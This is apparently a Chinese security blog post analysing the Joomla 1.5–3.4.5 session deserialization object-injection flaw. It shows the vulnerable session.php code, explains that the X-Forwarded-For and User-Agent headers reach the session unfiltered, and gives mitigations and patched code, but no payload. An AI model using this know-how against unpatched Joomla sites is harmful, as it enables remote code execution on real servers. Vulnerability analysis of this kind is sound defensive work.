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" alt="" />

Relevant Link:

https://github.com/php/php-src/blob/PHP-5.4.5/ext/session/session.c

4. 漏洞代码分析

\Joomla_3.4.5_to_3.4.6-Stable-Patch_Package\libraries\joomla\session\session.php

// Record proxy forwarded for in the session in case we need it later

        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))

        {

            //将HTTP数据包中的HTTP_X_FORWARDED_FOR保存到全局SESSION中

            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);

        }

        // Check for client address

        if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']))

        {

            $ip = $this->get('session.client.address');

            if ($ip === null)

            {

                $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);

            }

            elseif ($_SERVER['REMOTE_ADDR'] !== $ip)

            {

                $this->_state = 'error';

                return false;

            }

        }

        // Check for clients browser

        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))

        {

            $browser = $this->get('session.client.browser');

            if ($browser === null)

            {

                //将HTTP数据包中的HTTP_X_FORWARDED_FOR保存到全局SESSION中

                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);

            }

            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)

            {

                // @todo remove code: $this->_state = 'error';

                // @todo remove code: return false;

            }

        }

攻击者发送的畸形HTTP数据包的数据,会被joomla保存到全局SESSION中,Session默认初始化是在所有代码执行之前,然而joomla使用自定义存储session机制,替换了php自带的存储方式使用session_set_save_handler自定义了session存储函数
\Joomla_3.4.5\libraries\joomla\session\storage.php

public function register()

{

    // Use this object as the session handler

    session_set_save_handler(

    array($this, 'open'), array($this, 'close'), array($this, 'read'), array($this, 'write'), array($this, 'destroy'), array($this, 'gc')

    );

}

Relevant Link:

http://zone.wooyun.org/content/24440

http://zone.wooyun.org/content/24444

http://drops.wooyun.org/papers/11330

5. POC构造技巧

http://drops.wooyun.org/papers/11330

6. 防御方案

. /Joomla/configuration.php

class JConfig

{

    ..

    public $session_handler = 'files';

}

. 升级PHP >= 5.6.

从PHP 5.6.13开始,如果第一个变量解析错误,直接销毁整个session 

. joomla CMS代码修复

https://github.com/joomla/joomla-cms/releases/download/3.4.6/Joomla_3.4.5_to_3.4.6-Stable-Patch_Package.tar.gz

\Joomla_3..5_to_3.4.6-Stable-Patch_Package\libraries\joomla\session\session.php

. 去除HTTP_USER_AGENT的接收

. 使用filter_var验证HTTP_X_FORWARDED_FOR是否符合IP格式,防御通过这个字段的注入攻击

// Check for client address

if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP) !== false)

{

    $ip = $this->get('session.client.address');

    if ($ip === null)

    {

        $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);

    }

    elseif ($_SERVER['REMOTE_ADDR'] !== $ip)

    {

        $this->_state = 'error';

        return false;

    }

}

// Record proxy forwarded for in the session in case we need it later

if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) !== false)

{

    $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);

}

Relevant Link:

7. Code Pathc方案

\libraries\joomla\session\session.php

// Record proxy forwarded for in the session in case we need it later

        /*

        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))

        */

        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) !== false)

        {

            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);

        }

        // Check for client address

        /*

        if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']))

        */

        if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP) !== false)

        {

            $ip = $this->get('session.client.address');

            if ($ip === null)

            {

                $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);

            }

            elseif ($_SERVER['REMOTE_ADDR'] !== $ip)

            {

                $this->_state = 'error';

                return false;

            }

        }

        // Check for clients browser

        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))

        {

            /*

            $browser = $this->get('session.client.browser');

            */

            $browser = "";

            if ($browser === null)

            {

                /*

                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);

                */

                $this->set('session.client.browser', "");

            }

            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)

            {

                // @todo remove code: $this->_state = 'error';

                // @todo remove code: return false;

            }

        }

Copyright (c) 2015 Little5ann All rights reserved

joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞的更多相关文章

  1. joomla对象注入漏洞分析

    0x00 漏洞简单介绍 jooomla 1.5 到 3.4.5 的全部版本号中存在反序列化对象造成对象注入的漏洞,漏洞利用无须登录,直接在前台就可以运行随意PHP代码. Joomla 安全团队紧急公布 ...

  2. dedecms SESSION变量覆盖导致SQL注入漏洞修补方案

    dedecms的/plus/advancedsearch.php中,直接从$_SESSION[$sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_st ...

  3. PHP反序列化中过滤函数使用不当导致的对象注入

    1.漏洞产生的原因 ####  正常的反序列化语句是这样的 $a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"pa ...

  4. PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患(转)

    PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 时间 2014-11-14 15:05:49  WooYun知识库 原文  http://drops.wooyun.org/t ...

  5. Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析

    RickGray · 2015/10/26 11:24 昨日,Joomla CMS发布新版本3.4.5,该版本修复了一个高危的SQL注入漏洞,3.2至3.4.4版本都受到影响.攻击者通过该漏洞可以直接 ...

  6. Cookie和Session(session过程和设置进程外session)

    cookie 和  session 的区别 cookie 是保存在客户端上的一种机制   而session 是保存在服务端的一种机制 cookie的理解: 打个简单的比方,一个人生病了去A医院看病,回 ...

  7. 巨人大哥谈Web应用中的Session(session详解)

    巨人大哥谈Web应用中的Session(session详解) 虽然session机制在web应用程序中被采用已经很长时间了,但是仍然有很多人不清楚session机制的本质,以至不能正确的应用这一技术. ...

  8. Session session = connection.createSession(paramA,paramB);参数解析

    Session session = connection.createSession(paramA,paramB); paramA是设置事务,paramB是设置acknowledgment mode ...

  9. JMS Session session = connection.createSession(paramA,paramB) 两个参数不同组合下的含义和区别

    Session session = connection.createSession(paramA,paramB); paramA是设置事务,paramB是设置acknowledgment mode ...

随机推荐

  1. SQL使用开窗函数与CTE查询每月销售额的前几名

    WITH tagTab AS( SELECT YearMonth, pm=RANK() OVER(PARTITION BY YearMonth ORDER BY amount DESC) FROM S ...

  2. 手把手教你使用markdown

    这是 [认真学编程] 系列的 第3篇 文章,欢迎点赞分享.写留言,这些都是对我最好的支持. 全文2300字,阅读预计5分钟] 在前面几篇文章中,多次提到装X神器markdown,本人也是markdow ...

  3. 在线音乐网站【04】Part two 功能实现

       上一篇博客里面已近总结了三个功能的具体实现,今天把剩余功能的具体实现补充总结,如果你想对整个小项目有清楚的了解,建议去看下前几篇博客. 1.在线音乐网站(1)需求和功能结构 2.在线音乐网站(2 ...

  4. 【分布式协调器】Paxos的工程实现-cocklebur简介(二)

    Cocklebur集群的工作原理 在集群正常工作时,整个集群只会有一个Leader,其他都是Follower.Client可以注册到某个Follower,当然也可以注册到Leader,为了减轻Lead ...

  5. 再记一次w3wp占用CPU过高的解决过程(Dictionary和线程安全)

    在此之前项目有发生过两次类似的状况,都得以解决,但最近又会发现偶尔CPU会跑满,虽然之前使用过WinDbg解决过两次问题但人的记忆是不可靠的,今天处理同样问题的时候还是遇到了一些障碍,这一次希望可以记 ...

  6. ModernUI教程:如何从MUI样式中派生自定义样式

    下面的步骤用来说明怎么样去创建一个基于MUI的自定义样式.让我们创建一个字体颜色显示为红色的按钮样式. 可视化显示如下: 因为我们并没有明确生命继承自MUI风格,它还是采用WPF的默认风格.我们需要设 ...

  7. 前端框架——AmazeUI学习

    AmazeUI官网: http://amazeui.org/ 前后台模板下载:链接:链接:http://pan.baidu.com/s/1c2uVfk0 密码:zuva 十大前端框架参考链接:http ...

  8. php file_get_contents失败[function.file-get-contents]: failed to open stream: HTTP request failed!解决

    在使用file_get_contents方法来获取远程文件时会出现 [function.file-get-contents]: failed to open stream: HTTP request ...

  9. win7 IIS 部署-vs2012开发网站-全是问题啊。。。

    1.文件夹权限everyone2.aspnet_regiis.exe -i 表现为:

  10. 修改placehosder

    CSS美化INPUT placeholder效果.CSS代码美化文本框里的placeholder文字. ::selection伪元素 简而言之:单冒号(:)用于CSS3伪类,双冒号(::)用于CSS3 ...